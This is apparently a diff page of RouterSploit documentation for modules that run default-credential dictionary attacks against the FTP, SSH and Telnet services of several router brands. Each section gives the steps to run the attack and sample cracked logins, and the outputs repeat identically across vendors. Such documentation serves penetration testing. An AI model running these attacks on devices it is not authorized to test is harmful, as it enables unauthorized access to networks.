rsf > use creds/routers/belkin/ftp_default_creds
rsf (Belkin Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Belkin Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/belkin/ssh_default_creds
rsf (Belkin Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Belkin Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/belkin/telnet_default_creds
rsf (Belkin Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Bhu Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/ftp_default_creds
rsf (Bhu Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Bhu Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/ssh_default_creds
rsf (Bhu Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Bhu Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/telnet_default_creds
rsf (Bhu Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Billion Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/ftp_default_creds
rsf (Billion Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Billion Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/ssh_default_creds
rsf (Billion Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Billion Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/telnet_default_creds
rsf (Billion Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Cisco Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/ftp_default_creds
rsf (Cisco Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Cisco Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/ssh_default_creds
rsf (Cisco Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Cisco Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/telnet_default_creds
rsf (Cisco Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Comtrend Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/ftp_default_creds
rsf (Comtrend Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Comtrend Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/ssh_default_creds
rsf (Comtrend Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Comtrend Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/telnet_default_creds
rsf (Comtrend Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against D-Link Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/ftp_default_creds
rsf (D-Link Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against D-Link Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/ssh_default_creds
rsf (D-Link Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against D-Link Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/telnet_default_creds
rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
This diff is collapsed. Click to expand it.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment